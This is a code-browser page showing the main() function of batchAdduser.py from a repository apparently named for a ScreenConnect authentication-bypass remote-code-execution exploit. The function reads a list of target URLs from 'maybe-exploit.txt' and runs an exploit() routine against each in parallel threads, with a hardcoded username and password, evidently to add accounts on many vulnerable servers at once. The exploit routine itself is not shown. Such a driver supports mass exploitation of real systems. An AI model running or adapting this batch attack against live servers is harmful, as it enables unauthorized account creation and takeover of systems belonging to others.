MCPcopy Create free account
hub / github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE / main

Function main

batchAdduser.py:62–76  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

60 return False
61
62def main():
63 with open("maybe-exploit.txt", "r") as file:
64 urls = file.readlines()
65 username = "cvetest"
66 password = "cvetest@2023"
67 # Fill it in casually, for example: poc.com
68 domain = "poc.com"
69 threads = []
70 for url in urls:
71 url = url.strip()
72 thread = threading.Thread(target=exploit, args=(url, username, password, domain))
73 thread.start()
74 threads.append(thread)
75 for thread in threads:
76 thread.join()
77
78if __name__ == "__main__":
79 main()

Callers 1

batchAdduser.pyFile · 0.70

Calls

no outgoing calls

Tested by

no test coverage detected